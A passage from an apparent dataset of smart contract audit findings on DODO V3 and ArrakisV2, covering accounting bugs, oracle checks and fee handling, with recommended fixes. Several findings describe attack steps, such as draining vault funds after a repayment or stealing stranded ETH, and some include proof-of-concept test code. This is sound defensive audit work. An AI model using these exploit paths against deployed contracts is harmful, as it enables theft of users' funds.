info.totalBorrows - amount;\\n info.balance = info.balance - amount; // amount should be added here\\n\\n IERC20(token).safeTransferFrom(pool, address(this), amount);\\n\\n emit PoolRepay(pool, token, amount, interests);\\n }\\n```\\n\\nLet's say a vault has 100,000 USDC A pool borrows 20,000 USDC from vault\\nWhen the pool calls `poolRepayAll()`, the asset info in vault will change as follows:\\n`totalBorrows => 20,000 - 20,000 => 0` // info.totalBorrows - amount\\n`balance => 100,000 - 20,000 => 80,000` // info.balance - amount\\n`tokens owned by vault => 100,000 + 20,000 => 120,000 USDC` // 20,000 USDC is transferred from pool to vault (repayment)\\nThe difference of recorded balance (80,000) and actual balance (120,000) is `40,000 USDC`\\nAn attacker waits for the `poolRepayAll()` function call by a pool.\\nWhen `poolRepayAll()` is executed, the attacker calls D3VaultFunding.sol userDeposit(), which deposits 40,000 USDC in vault on behalf of the attacker.\\nAfter this, the attacker withdraws the deposited amount using D3VaultFunding.sol userWithdraw() and thus gains 40,000 USDC.\\n```\\n function userDeposit(address user, address token) external nonReentrant allowedToken(token) {\\n .\\n .\\n .\\n AssetInfo storage info = assetInfo[token];\\n uint256 realBalance = IERC20(token).balanceOf(address(this)); // check tokens owned by vault\\n uint256 amount = realBalance - info.balance; // amount = 120000-80000\\n .\\n .\\n .\\n IDToken(info.dToken).mint(user, dTokenAmount);\\n info.balance = realBalance;\\n\\n emit UserDeposit(user, token, amount);\\n }\\n```\\nчIssue When a D3MM pool repays all of the borrowed funds to vault using `D3Funding.sol repayAll`, an attacker can steal double the amount of those funds from vault\\nIn D3VaultFunding.sol _poolRepayAll, do the following changes:\\nCurrent code: `info.balance = info.balance - amount;`\\nNew (replace '-' with '+'): `info.balance = info.balance + amount;`чLoss of funds from vault. The loss will be equal to 2x amount of borrowed tokens that a D3MM pool repays using D3VaultFunding.sol poolRepayAllч```\\n function _poolRepayAll(address pool, address token) internal {\\n .\\n .\\n info.totalBorrows = info.totalBorrows - amount;\\n info.balance = info.balance - amount; // amount should be added here\\n .\\n .\\n }\\n```\\n -possible precision loss in D3VaultLiquidation.finishLiquidation() function when calculating realDebt because of division before multiplicationчmediumчfinishLiquidation() divides before multiplying when calculating realDebt.\\n```\\nuint256 realDebt = borrows.div(record.interestIndex == 0 ? 1e18 : record.interestIndex).mul(info.borrowIndex);\\n```\\n\\nThere will be precision loss when calculating the realDebt because solidity truncates values when dividing and dividing before multiplying causes precision loss.\\nValues that suffered from precision loss will be updated here\\n```\\n info.totalBorrows = info.totalBorrows - realDebt;\\n```\\nчdon't divide before multiplyingчIssue possible precision loss in D3VaultLiquidation.finishLiquidation() function when calculating realDebt because of division before multiplication\\nValues that suffered from precision loss will be updated here\\n```\\n info.totalBorrows = info.totalBorrows - realDebt;\\n```\\nч```\\nuint256 realDebt = borrows.div(record.interestIndex == 0 ? 1e18 : record.interestIndex).mul(info.borrowIndex);\\n```\\n -`D3VaultFunding.userWithdraw()` doen not have mindTokenAmountчmediumч`D3VaultFunding.userWithdraw()` doen not have mindTokenAmount, and use `_getExchangeRate` directly.This is vulnerable to a sandwich attack.\\nAs we can see, `D3VaultFunding.userWithdraw()` doen not have mindTokenAmount, and use `_getExchangeRate` directly.\\n```\\nfunction userWithdraw(address to, address user, address token, uint256 dTokenAmount) external nonReentrant allowedToken(token) returns(uint256 amount) {\\n accrueInterest(token);\\n AssetInfo storage info = assetInfo[token];\\n require(dTokenAmount <= IDToken(info.dToken).balanceOf(msg.sender), Errors.DTOKEN_BALANCE_NOT_ENOUGH);\\n\\n amount = dTokenAmount.mul(_getExchangeRate(token));//@audit does not check amount value\\n IDToken(info.dToken).burn(msg.sender, dTokenAmount);\\n IERC20(token).safeTransfer(to, amount);\\n info.balance = info.balance - amount;\\n\\n // used for calculate user withdraw amount\\n // this function could be called from d3Proxy, so we need \"user\" param\\n // In the meantime, some users may hope to use this function directly,\\n // to prevent these users fill \"user\" param with wrong addresses,\\n // we use \"msg.sender\" param to check.\\n emit UserWithdraw(msg.sender, user, token, amount);\\n }\\n```\\n\\nAnd the `_getExchangeRate()` result is about `cash` , `info.totalBorrows`, info.totalReserves,info.withdrawnReserves,dTokenSupply,This is vulnerable to a sandwich attack leading to huge slippage\\n```\\nfunction _getExchangeRate(address token) internal view returns (uint256) {\\n AssetInfo storage info = assetInfo[token];\\n uint256 cash = getCash(token);\\n uint256 dTokenSupply = IERC20(info.dToken).totalSupply();\\n if (dTokenSupply == 0) { return 1e18; }\\n return (cash + info.totalBorrows - (info.totalReserves - info.withdrawnReserves)).div(dTokenSupply);\\n } \\n```\\nчAdd `mindTokenAmount` parameter for `userWithdraw()` function and check if `amount < mindTokenAmount`чThis is vulnerable to a sandwich attack.ч```\\nfunction userWithdraw(address to, address user, address token, uint256 dTokenAmount) external nonReentrant allowedToken(token) returns(uint256 amount) {\\n accrueInterest(token);\\n AssetInfo storage info = assetInfo[token];\\n require(dTokenAmount <= IDToken(info.dToken).balanceOf(msg.sender), Errors.DTOKEN_BALANCE_NOT_ENOUGH);\\n\\n amount = dTokenAmount.mul(_getExchangeRate(token));//@audit does not check amount value\\n IDToken(info.dToken).burn(msg.sender, dTokenAmount);\\n IERC20(token).safeTransfer(to, amount);\\n info.balance = info.balance - amount;\\n\\n // used for calculate user withdraw amount\\n // this function could be called from d3Proxy, so we need \"user\" param\\n // In the meantime, some users may hope to use this function directly,\\n // to prevent these users fill \"user\" param with wrong addresses,\\n // we use \"msg.sender\" param to check.\\n emit UserWithdraw(msg.sender, user, token, amount);\\n }\\n```\\n -D3Oracle will return the wrong price if the Chainlink aggregator returns price outside min/max rangeчmediumчChainlink oracles have a min and max price that they return. If the price goes below the minimum price the oracle will not return the correct price but only the min price. Same goes for the other extremity.\\nBoth `getPrice()` and `getOriginalPrice()` only check `price > 0` not are they within the correct range\\n```\\n(uint80 roundID, int256 price,, uint256 updatedAt, uint80 answeredInRound) = priceFeed.latestRoundData();\\nrequire(price > 0, \"Chainlink: Incorrect Price\");\\nrequire(block.timestamp - updatedAt < priceSources[token].heartBeat, \"Chainlink: Stale Price\");\\nrequire(answeredInRound >= roundID, \"Chainlink: Stale Price\");\\n```\\nчCheck the latest answer against reasonable limits and/or revert in case you get a bad price\\n```\\n require(price >= minAnswer && price <= maxAnswer, \"invalid price\");\\n```\\nчThe wrong price may be returned in the event of a market crash. The functions with the issue are used in `D3VaultFunding.sol`, `D3VaultLiquidation.sol` and `D3UserQuota.sol`ч```\\n(uint80 roundID, int256 price,, uint256 updatedAt, uint80 answeredInRound) = priceFeed.latestRoundData();\\nrequire(price > 0, \"Chainlink: Incorrect Price\");\\nrequire(block.timestamp - updatedAt < priceSources[token].heartBeat, \"Chainlink: Stale Price\");\\nrequire(answeredInRound >= roundID, \"Chainlink: Stale Price\");\\n```\\n -parseAllPrice not support the tokens whose decimal is greater than 18чmediumч`parseAllPrice` not support the token decimal is greater than 18, such as NEAR with 24 decimal. Since `buyToken / sellToken` is dependent on `parseAllPrice`, so users can't trade tokens larger than 18 decimal, but DODOv3 is intended to be compatible with all standard ERC20, which is not expected.\\n```\\n // fix price decimal\\n if (tokenDecimal != 18) {\\n uint256 fixDecimal = 18 - tokenDecimal;\\n bidDownPrice = bidDownPrice / (10 ** fixDecimal);\\n bidUpPrice = bidUpPrice / (10 ** fixDecimal);\\n askDownPrice = askDownPrice * (10 ** fixDecimal);\\n askUpPrice = askUpPrice * (10 ** fixDecimal);\\n }\\n```\\n\\nIf `tokenDecimal > 18`, `18 - tokenDecimal` will revertчFix decimal to 36 instead of 18чDODOv3 is not compatible the tokens whose decimal is greater than 18, users can't trade them.ч```\\n // fix price decimal\\n if (tokenDecimal != 18) {\\n uint256 fixDecimal = 18 - tokenDecimal;\\n bidDownPrice = bidDownPrice / (10 ** fixDecimal);\\n bidUpPrice = bidUpPrice / (10 ** fixDecimal);\\n askDownPrice = askDownPrice * (10 ** fixDecimal);\\n askUpPrice = askUpPrice * (10 ** fixDecimal);\\n }\\n```\\n -Wrong assignment of `cumulativeBid` for RangeOrder state in getRangeOrderState functionчmediumчWrong assignment of `cumulativeBid` for RangeOrder state\\nIn `D3Trading`, the `getRangeOrderState` function is returning RangeOrder (get swap status for internal swap) which is assinging wrong toTokenMMInfo.cumulativeBid which suppose to be `cumulativeBid` not `cumulativeAsk`\\nThe error lies in the assignment of `roState.toTokenMMInfo.cumulativeBid`. Instead of assigning `tokenCumMap[toToken].cumulativeAsk`, it should be assigning `tokenCumMap[toToken].cumulativeBid`.\\n```\\nFile: D3Trading.sol\\n roState.toTokenMMInfo.cumulativeBid =\\n allFlag (toTokenIndex) & 1 == 0 ? 0 : tokenCumMap[toToken].cumulativeAsk;\\n```\\n\\nThis wrong assignment value definitely will mess up accounting balance, resulting unknown state will occure, which is not expected by the protocol\\nFor one case, this `getRangeOrderState` is being used in `querySellTokens` & `queryBuyTokens` which may later called from `sellToken` and `buyToken`. The issue is when calling `_contructTokenState` which can be reverted from `PMMRangeOrder` when buy or sell token\\n```\\nFile: PMMRangeOrder.sol\\n // B\\n tokenState.B = askOrNot ? tokenState.B0 - tokenMMInfo.cumulativeAsk : tokenState.B0 - tokenMMInfo.cumulativeBid;\\n```\\n\\nWhen the `tokenMMInfo.cumulativeBid` (which was wrongly assign from cumulativeAsk) is bigger than `tokenState.B0`, this will revertчFix the error to\\n```\\nFile: D3Trading.sol\\n roState.toTokenMMInfo.cumulativeBid =\\n// Remove the line below\\n// Remove the line below\\n: allFlag (toTokenIndex) & 1 == 0 ? 0 : tokenCumMap[toToken].cumulativeAsk;\\n// Add the line below\\n// Add the line below\\n: allFlag (toTokenIndex) & 1 == 0 ? 0 : tokenCumMap[toToken].cumulativeBid;\\n```\\nчThis wrong assignment value definitely will mess up accounting balance, resulting unknown state will occure, which is not expected by the protocol. For example reverting state showing a case above.ч```\\nFile: D3Trading.sol\\n roState.toTokenMMInfo.cumulativeBid =\\n allFlag (toTokenIndex) & 1 == 0 ? 0 : tokenCumMap[toToken].cumulativeAsk;\\n```\\n -D3VaultFunding#checkBadDebtAfterAccrue is inaccurate and can lead to further damage to both LP's and MMчmediumчD3VaultFunding#checkBadDebtAfterAccrue makes the incorrect assumption that a collateral ratio of less than 1e18 means that the pool has bad debt. Due to how collateral and debt weight affect the collateral ratio calculation a pool can have a collateral ratio less than 1e18 will still maintaining debt that is profitable to liquidate. The result of this is that the after this threshold has been passed, a pool can no longer be liquidate by anyone which can lead to continued losses that harm both the LPs and the MM being liquidated.\\nD3VaultFunding.sol#L382-L386\\n```\\n if (balance >= borrows) {\\n collateral += min(balance - borrows, info.maxCollateralAmount).mul(info.collateralWeight).mul(price);\\n } else {\\n debt += (borrows - balance).mul(info.debtWeight).mul(price);\\n }\\n```\\n\\nWhen calculating the collateral and debt values, the value of the collateral is adjusted by the collateralWeight and debtWeight respectively. This can lead to a position in which the collateral ratio is less than 1e18, which incorrectly signals the pool has bad debt via the checkBadDebtAfterAccrue check.\\nExample:\\n```\\nAssume a pool has the following balances and debts:\\n\\nToken A - 100 borrows 125 balance\\nToken B - 100 borrows 80 balance\\n\\nPrice A = 1\\ncollateralWeightA = 0.8\\n\\nPrice B = 1\\ndebtWeightB = 1.2\\n\\ncollateral = 25 * 1 * 0.8 = 20\\ndebt = 20 * 1 * 1.2 = 24\\n\\ncollateralRatio = 20/24 = 0.83\\n```\\n\\nThe problem here is that there is no bad debt at all and it is still profitable to liquidate this pool, even with a discount:\\n```\\nExcessCollateral = 125 - 100 = 25\\n\\n25 * 1 * 0.95 [DISCOUNT] = 23.75\\n\\nExcessDebt = 100 - 80 = 20\\n\\n20 * 1 = 20\\n```\\n\\nThe issue with this is that once this check has been triggered, no other market participants besides DODO can liquidate this position. This creates a significant inefficiency in the market that can easily to real bad debt being created for the pool. This bad debt is harmful to both the pool MM, who could have been liquidated with remaining collateral, and also the vault LPs who directly pay for the bad debt.чThe methodology of the bad debt check should be changed to remove collateral and debt weights to accurately indicate the presence of bad debt.чUnnecessary loss of funds to LPs and MMsч```\\n if (balance >= borrows) {\\n collateral += min(balance - borrows, info.maxCollateralAmount).mul(info.collateralWeight).mul(price);\\n } else {\\n debt += (borrows - balance).mul(info.debtWeight).mul(price);\\n }\\n```\\n -D3UserQuote#getUserQuote queries incorrect token for exchangeRate leading to inaccurate quota calculationsчmediumчA small typo in the valuation loop of D3UserQuote#getUserQuote uses the wrong variable leading to and incorrect quota being returned. The purpose of a quota is to mitigate risk of positions being too large. This incorrect assumption can dramatically underestimate the quota leading to oversized (and overrisk) positions.\\nD3UserQuota.sol#L75-L84\\n```\\n for (uint256 i = 0; i < tokenList.length; i++) {\\n address _token = tokenList[i];\\n (address assetDToken,,,,,,,,,,) = d3Vault.getAssetInfo(_token);\\n uint256 tokenBalance = IERC20(assetDToken).balanceOf(user);\\n if (tokenBalance > 0) {\\n tokenBalance = tokenBalance.mul(d3Vault.getExchangeRate(token)); <- @audit-issue queries token instead of _token\\n (uint256 tokenPrice, uint8 priceDecimal) = ID3Oracle(d3Vault._ORACLE_()).getOriginalPrice(_token);\\n usedQuota = usedQuota + tokenBalance * tokenPrice / 10 ** (priceDecimal+tokenDecimals);\\n }\\n }\\n```\\n\\nD3UserQuota.sol#L80 incorrectly uses token rather than _token as it should. This returns the wrong exchange rate which can dramatically alter the perceived token balance as well as the calculated quota.чChange variable from token to _token:\\n```\\n- tokenBalance = tokenBalance.mul(d3Vault.getExchangeRate(token));\\n+ tokenBalance = tokenBalance.mul(d3Vault.getExchangeRate(_token));\\n```\\nчQuota is calculated incorrectly leading to overly risky positions, which in turn can cause loss to the systemч```\\n for (uint256 i = 0; i < tokenList.length; i++) {\\n address _token = tokenList[i];\\n (address assetDToken,,,,,,,,,,) = d3Vault.getAssetInfo(_token);\\n uint256 tokenBalance = IERC20(assetDToken).balanceOf(user);\\n if (tokenBalance > 0) {\\n tokenBalance = tokenBalance.mul(d3Vault.getExchangeRate(token)); <- @audit-issue queries token instead of _token\\n (uint256 tokenPrice, uint8 priceDecimal) = ID3Oracle(d3Vault._ORACLE_()).getOriginalPrice(_token);\\n usedQuota = usedQuota + tokenBalance * tokenPrice / 10 ** (priceDecimal+tokenDecimals);\\n }\\n }\\n```\\n -Calculation B0 meets devision 0 error when a token has small decimal and high price with a small kBidчmediumчHere is poc\\n```\\n function testQueryFail() public {\\n token1ChainLinkOracle.feedData(30647 * 1e18);\\n token2ChainLinkOracle.feedData(1 * 1e18);\\n vm.startPrank(maker);\\n uint32[] memory tokenKs = new uint32[](2);\\n tokenKs[0] = 0;\\n tokenKs[1] = (1<< 16) +1;\\n address[] memory tokens = new address[](2);\\n tokens[0] = address(token2);\\n tokens[1] = address(token1);\\n address[] memory slotIndex = new address[](2);\\n slotIndex[0] = address(token1);\\n slotIndex[1] = address(token2);\\n uint80[] memory priceSlot = new uint80[](2);\\n priceSlot[0] = 2191925019632266903652;\\n priceSlot[1] = 720435765840878108682;\\n\\n uint64[] memory amountslot = new uint64[](2);\\n amountslot[0] = stickAmount(10,8, 400000, 18);\\n amountslot[1] = stickAmount(400000, 18, 400000, 18);\\n d3MakerWithPool.setTokensKs(tokens, tokenKs);\\n d3MakerWithPool.setTokensPrice(slotIndex, priceSlot);\\n d3MakerWithPool.setTokensAmounts(slotIndex, amountslot);\\n vm.stopPrank();\\n\\n (uint256 askDownPrice, uint256 askUpPrice, uint256 bidDownPrice, uint256 bidUpPrice, uint256 swapFee) =\\n d3MM.getTokenMMPriceInfoForRead(address(token1));\\n assertEq(askDownPrice, 304555028000000000000000000000000);\\n assertEq(askUpPrice, 307231900000000000000000000000000);\\n assertEq(bidDownPrice, 3291);\\n assertEq(bidUpPrice, 3320);\\n assertEq(swapFee, 1200000000000000);\\n\\n //console.log(askDownPrice);\\n //console.log(askUpPrice);\\n //console.log(bidDownPrice);\\n //console.log(bidUpPrice);\\n //console.log(swapFee);\\n\\n (,,uint kask, uint kbid,,) = d3MM.getTokenMMOtherInfoForRead(address(token1));\\n assertEq(kask, 1e14);\\n assertEq(kbid, 1e14);\\n\\n (askDownPrice, askUpPrice, bidDownPrice, bidUpPrice, swapFee) =\\n d3MM.getTokenMMPriceInfoForRead(address(token2));\\n assertEq(askDownPrice, 999999960000000000);\\n assertEq(askUpPrice, 1000799800000000000);\\n assertEq(bidDownPrice, 1000400120032008002);\\n assertEq(bidUpPrice, 1001201241249250852);\\n assertEq(swapFee, 200000000000000);\\n\\n (,,kask, kbid,,) = d3MM.getTokenMMOtherInfoForRead(address(token2));\\n assertEq(kask, 0);\\n assertEq(kbid, 0);\\n\\n //console.log(askDownPrice);\\n //console.log(askUpPrice);\\n //console.log(bidDownPrice);\\n //console.log(bidUpPrice);\\n //console.log(swapFee);\\n //console.log(kask);\\n //console.log(kbid);\\n\\n SwapCallbackData memory swapData;\\n swapData.data = \"\";\\n swapData.payer = user1;\\n\\n //uint256 gasleft1 = gasleft();\\n uint256 receiveToToken = d3Proxy.sellTokens(\\n address(d3MM),\\n user1,\\n address(token1),\\n address(token2),\\n 1000000,\\n 0,\\n abi.encode(swapData),\\n block.timestamp + 1000\\n );\\n```\\n\\nIt will revert. In this example, wbtc price is 30445, and k = 0.0001, suppose maker contains rules, but model is invalid.чFix formula for this corner case, like making temp2 = 1\\nImprove calculation accuracy by consistently using precision 18 for calculations and converting to real decimal when processing amounts.чMaker sets right parameters but traders can't swap. It will make swap model invalid.\\nTool Used\\nManual Reviewч```\\n function testQueryFail() public {\\n token1ChainLinkOracle.feedData(30647 * 1e18);\\n token2ChainLinkOracle.feedData(1 * 1e18);\\n vm.startPrank(maker);\\n uint32[] memory tokenKs = new uint32[](2);\\n tokenKs[0] = 0;\\n tokenKs[1] = (1<< 16) +1;\\n address[] memory tokens = new address[](2);\\n tokens[0] = address(token2);\\n tokens[1] = address(token1);\\n address[] memory slotIndex = new address[](2);\\n slotIndex[0] = address(token1);\\n slotIndex[1] = address(token2);\\n uint80[] memory priceSlot = new uint80[](2);\\n priceSlot[0] = 2191925019632266903652;\\n priceSlot[1] = 720435765840878108682;\\n\\n uint64[] memory amountslot = new uint64[](2);\\n amountslot[0] = stickAmount(10,8, 400000, 18);\\n amountslot[1] = stickAmount(400000, 18, 400000, 18);\\n d3MakerWithPool.setTokensKs(tokens, tokenKs);\\n d3MakerWithPool.setTokensPrice(slotIndex, priceSlot);\\n d3MakerWithPool.setTokensAmounts(slotIndex, amountslot);\\n vm.stopPrank();\\n\\n (uint256 askDownPrice, uint256 askUpPrice, uint256 bidDownPrice, uint256 bidUpPrice, uint256 swapFee) =\\n d3MM.getTokenMMPriceInfoForRead(address(token1));\\n assertEq(askDownPrice, 304555028000000000000000000000000);\\n assertEq(askUpPrice, 307231900000000000000000000000000);\\n assertEq(bidDownPrice, 3291);\\n assertEq(bidUpPrice, 3320);\\n assertEq(swapFee, 1200000000000000);\\n\\n //console.log(askDownPrice);\\n //console.log(askUpPrice);\\n //console.log(bidDownPrice);\\n //console.log(bidUpPrice);\\n //console.log(swapFee);\\n\\n (,,uint kask, uint kbid,,) = d3MM.getTokenMMOtherInfoForRead(address(token1));\\n assertEq(kask, 1e14);\\n assertEq(kbid, 1e14);\\n\\n (askDownPrice, askUpPrice, bidDownPrice, bidUpPrice, swapFee) =\\n d3MM.getTokenMMPriceInfoForRead(address(token2));\\n assertEq(askDownPrice, 999999960000000000);\\n assertEq(askUpPrice, 1000799800000000000);\\n assertEq(bidDownPrice, 1000400120032008002);\\n assertEq(bidUpPrice, 1001201241249250852);\\n assertEq(swapFee, 200000000000000);\\n\\n (,,kask, kbid,,) = d3MM.getTokenMMOtherInfoForRead(address(token2));\\n assertEq(kask, 0);\\n assertEq(kbid, 0);\\n\\n //console.log(askDownPrice);\\n //console.log(askUpPrice);\\n //console.log(bidDownPrice);\\n //console.log(bidUpPrice);\\n //console.log(swapFee);\\n //console.log(kask);\\n //console.log(kbid);\\n\\n SwapCallbackData memory swapData;\\n swapData.data = \"\";\\n swapData.payer = user1;\\n\\n //uint256 gasleft1 = gasleft();\\n uint256 receiveToToken = d3Proxy.sellTokens(\\n address(d3MM),\\n user1,\\n address(token1),\\n address(token2),\\n 1000000,\\n 0,\\n abi.encode(swapData),\\n block.timestamp + 1000\\n );\\n```\\n -When swapping 18-decimal token to 8-decimal token , user could buy decimal-18-token with 0 amount of decimal-8-tokenчmediumчHere is the poc:\\n```\\nuint256 payFromToken = d3Proxy.buyTokens(\\n address(d3MM),\\n user1,\\n address(token1),\\n address(token2),\\n 10000000,\\n 0,\\n abi.encode(swapData),\\n block.timestamp + 1000\\n );\\nassertEq(payFromToken, 0);\\n```\\nчIn buyToken() of D3Trading.sol, add this rule:\\n```\\nif(payFromAmount == 0) { // value too small\\n payFromAmount = 1;\\n }\\n```\\nчIt may cause unexpected loss\\nTool Used\\nManual Reviewч```\\nuint256 payFromToken = d3Proxy.buyTokens(\\n address(d3MM),\\n user1,\\n address(token1),\\n address(token2),\\n 10000000,\\n 0,\\n abi.encode(swapData),\\n block.timestamp + 1000\\n );\\nassertEq(payFromToken, 0);\\n```\\n -ArrakisV2Router#addLiquidityPermit2 will strand ETHчhighчInside ArrakisV2Router#addLiquidityPermit2, `isToken0Weth` is set incorrectly leading to the wrong amount of ETH being refunded to the user\\nArrakisV2Router.sol#L278-L298\\n```\\n bool isToken0Weth;\\n _permit2Add(params_, amount0, amount1, token0, token1);\\n\\n _addLiquidity(\\n params_.addData.vault,\\n amount0,\\n amount1,\\n sharesReceived,\\n params_.addData.gauge,\\n params_.addData.receiver,\\n token0,\\n token1\\n );\\n\\n if (msg.value > 0) {\\n if (isToken0Weth && msg.value > amount0) {\\n payable(msg.sender).sendValue(msg.value - amount0);\\n } else if (!isToken0Weth && msg.value > amount1) {\\n payable(msg.sender).sendValue(msg.value - amount1);\\n }\\n }\\n```\\n\\nAbove we see that excess msg.value is returned to the user at the end of the function. This uses the value of `isToken0Weth` to determine the amount to send back to the user. The issue is that `isToken0Weth` is set incorrectly and will lead to ETH being stranded in the contract. `isToken0Weth` is never set, it will always be `false`. This means that when WETH actually is token0 the incorrect amount of ETH will be sent back to the user.\\nThis same issue can also be used to steal the ETH left in the contract by a malicious user. To make matters worse, the attacker can manipulate the underlying pools to increase the amount of ETH left in the contract so they can steal even more.чMove `isToken0Weth` and set it correctly:\\n```\\n- bool isToken0Weth;\\n _permit2Add(params_, amount0, amount1, token0, token1);\\n\\n _addLiquidity(\\n params_.addData.vault,\\n amount0,\\n amount1,\\n sharesReceived,\\n params_.addData.gauge,\\n params_.addData.receiver,\\n token0,\\n token1\\n );\\n\\n if (msg.value > 0) {\\n+ bool isToken0Weth = _isToken0Weth(address(token0), address(token1));\\n if (isToken0Weth && msg.value > amount0) {\\n payable(msg.sender).sendValue(msg.value - amount0);\\n } else if (!isToken0Weth && msg.value > amount1) {\\n payable(msg.sender).sendValue(msg.value - amount1);\\n }\\n }\\n```\\nчETH will be stranded in contract and stolenч```\\n bool isToken0Weth;\\n _permit2Add(params_, amount0, amount1, token0, token1);\\n\\n _addLiquidity(\\n params_.addData.vault,\\n amount0,\\n amount1,\\n sharesReceived,\\n params_.addData.gauge,\\n params_.addData.receiver,\\n token0,\\n token1\\n );\\n\\n if (msg.value > 0) {\\n if (isToken0Weth && msg.value > amount0) {\\n payable(msg.sender).sendValue(msg.value - amount0);\\n } else if (!isToken0Weth && msg.value > amount1) {\\n payable(msg.sender).sendValue(msg.value - amount1);\\n }\\n }\\n```\\n -Then getAmountsForDelta function at Underlying.sol is implemented incorrectlyчmediumчThe function `getAmountsForDelta()` at the `Underlying.sol` contract is used to compute the quantity of `token0` and `token1` to add to the position given a delta of liquidity. These quantities depend on the delta of liquidity, the current tick and the ticks of the range boundaries. Actually, `getAmountsForDelta()` uses the sqrt prices instead of the ticks, but they are equivalent since each tick represents a sqrt price.\\nThere exists 3 cases:\\nThe current tick is outside the range from the left, this means only `token0` should be added.\\nThe current tick is within the range, this means both `token0` and `token1` should be added.\\nThe current tick is outside the range from the right, this means only `token1` should be added.\\nThe issue on the implementation is on the first case, which is coded as follows:\\n```\\nif (sqrtRatioX96 <= sqrtRatioAX96) {\\n amount0 = SafeCast.toUint256(\\n SqrtPriceMath.getAmount0Delta(\\n sqrtRatioAX96,\\n sqrtRatioBX96,\\n liquidity\\n )\\n );\\n} \\n```\\n\\nThe implementation says that if the current price is equal to the price of the lower tick, it means that it is outside of the range and hence only `token0` should be added to the position.\\nBut for the UniswapV3 implementation, the current price must be lower in order to consider it outside:\\n```\\nif (_slot0.tick < params.tickLower) {\\n // current tick is below the passed range; liquidity can only become in range by crossing from left to\\n // right, when we'll need _more_ token0 (it's becoming more valuable) so user must provide it\\n amount0 = SqrtPriceMath.getAmount0Delta(\\n TickMath.getSqrtRatioAtTick(params.tickLower),\\n TickMath.getSqrtRatioAtTick(params.tickUpper),\\n params.liquidityDelta\\n );\\n}\\n```\\n\\nReferenceчChange from:\\n```\\n// @audit-issue Change <= to <.\\nif (sqrtRatioX96 <= sqrtRatioAX96) {\\n amount0 = SafeCast.toUint256(\\n SqrtPriceMath.getAmount0Delta(\\n sqrtRatioAX96,\\n sqrtRatioBX96,\\n liquidity\\n )\\n );\\n}\\n```\\n\\nto:\\n```\\nif (sqrtRatioX96 < sqrtRatioAX96) {\\n amount0 = SafeCast.toUint256(\\n SqrtPriceMath.getAmount0Delta(\\n sqrtRatioAX96,\\n sqrtRatioBX96,\\n liquidity\\n )\\n );\\n}\\n```\\nчWhen the current price is equal to the left boundary of the range, the uniswap pool will request both `token0` and `token1`, but arrakis will only request from the user `token0` so the pool will lose some `token1` if it has enough to cover it.ч```\\nif (sqrtRatioX96 <= sqrtRatioAX96) {\\n amount0 = SafeCast.toUint256(\\n SqrtPriceMath.getAmount0Delta(\\n sqrtRatioAX96,\\n sqrtRatioBX96,\\n liquidity\\n )\\n );\\n} \\n```\\n -outdated variable is not effective to check price feed timelinessчmediumчIn ChainlinkOraclePivot, it uses one `outdated` variable to check if the two price feeds are `outdated`. However, this is not effective because the price feeds have different update frequencies.\\nLet's have an example:\\nIn Polygon mainnet, ChainlinkOraclePivot uses two Chainlink price feeds: MATIC/ETH and ETH/USD.\\nWe can see that\\nIn function `_getLatestRoundData`, both price feeds use the same `outdated` variable.\\nIf we set the `outdated` variable to 27s, the priceFeedA will revert most of the time since it is too short for the 86400s heartbeat.\\nIf we set the `outdated` variable to 86400s, the priceFeedB can have a very `outdated` value without revert.\\n```\\n try priceFeedA.latestRoundData() returns (\\n uint80,\\n int256 price,\\n uint256,\\n uint256 updatedAt,\\n uint80\\n ) {\\n require(\\n block.timestamp - updatedAt <= outdated, // solhint-disable-line not-rely-on-time\\n \"ChainLinkOracle: priceFeedA outdated.\"\\n );\\n\\n priceA = SafeCast.toUint256(price);\\n } catch {\\n revert(\"ChainLinkOracle: price feed A call failed.\");\\n }\\n\\n try priceFeedB.latestRoundData() returns (\\n uint80,\\n int256 price,\\n uint256,\\n uint256 updatedAt,\\n uint80\\n ) {\\n require(\\n block.timestamp - updatedAt <= outdated, // solhint-disable-line not-rely-on-time\\n \"ChainLinkOracle: priceFeedB outdated.\"\\n );\\n\\n priceB = SafeCast.toUint256(price);\\n } catch {\\n revert(\"ChainLinkOracle: price feed B call failed.\");\\n }\\n```\\nчHaving two `outdated` values for each price feed A and B.чThe `outdated` variable is not effective to check the timeliness of prices. It can allow stale prices in one price feed or always revert in another price feed.ч```\\n try priceFeedA.latestRoundData() returns (\\n uint80,\\n int256 price,\\n uint256,\\n uint256 updatedAt,\\n uint80\\n ) {\\n require(\\n block.timestamp - updatedAt <= outdated, // solhint-disable-line not-rely-on-time\\n \"ChainLinkOracle: priceFeedA outdated.\"\\n );\\n\\n priceA = SafeCast.toUint256(price);\\n } catch {\\n revert(\"ChainLinkOracle: price feed A call failed.\");\\n }\\n\\n try priceFeedB.latestRoundData() returns (\\n uint80,\\n int256 price,\\n uint256,\\n uint256 updatedAt,\\n uint80\\n ) {\\n require(\\n block.timestamp - updatedAt <= outdated, // solhint-disable-line not-rely-on-time\\n \"ChainLinkOracle: priceFeedB outdated.\"\\n );\\n\\n priceB = SafeCast.toUint256(price);\\n } catch {\\n revert(\"ChainLinkOracle: price feed B call failed.\");\\n }\\n```\\n -Update to `managerFeeBPS` applied to pending tokens yet to be claimedчmediumчA manager (malicious or not) can update the `managerFeeBPS` by calling `ArrakisV2.setManagerFeeBPS()`. The newly-updated `managerFeeBPS` will be retroactively applied to the pending fees yet to be claimed by the `ArrakisV2` contract.\\nWhenever UniV3 fees are collected (via `burn()` or rebalance()), the manager fees are applied to the received pending tokens.\\n```\\nfunction _applyFees(uint256 fee0_, uint256 fee1_) internal {\\n uint16 mManagerFeeBPS = managerFeeBPS;\\n managerBalance0 += (fee0_ * mManagerFeeBPS) / hundredPercent;\\n managerBalance1 += (fee1_ * mManagerFeeBPS) / hundredPercent;\\n}\\n```\\n\\nSince the manager can update the `managerFeeBPS` whenever, this calculation can be altered to take up to 100% of the pending fees in favor of the manager.\\n```\\nfunction setManagerFeeBPS(uint16 managerFeeBPS_) external onlyManager {\\n require(managerFeeBPS_ <= 10000, \"MFO\");\\n managerFeeBPS = managerFeeBPS_;\\n emit LogSetManagerFeeBPS(managerFeeBPS_);\\n}\\n```\\nчFees should be collected at the start of execution within the `setManagerFeeBPS()` function. This effectively checkpoints the fees properly, prior to updating the `managerFeeBPS` variable.чManager's ability to intentionally or accidently steal pending fees owed to stakersч```\\nfunction _applyFees(uint256 fee0_, uint256 fee1_) internal {\\n uint16 mManagerFeeBPS = managerFeeBPS;\\n managerBalance0 += (fee0_ * mManagerFeeBPS) / hundredPercent;\\n managerBalance1 += (fee1_ * mManagerFeeBPS) / hundredPercent;\\n}\\n```\\n -Wrong calculation of `tickCumulatives` due to 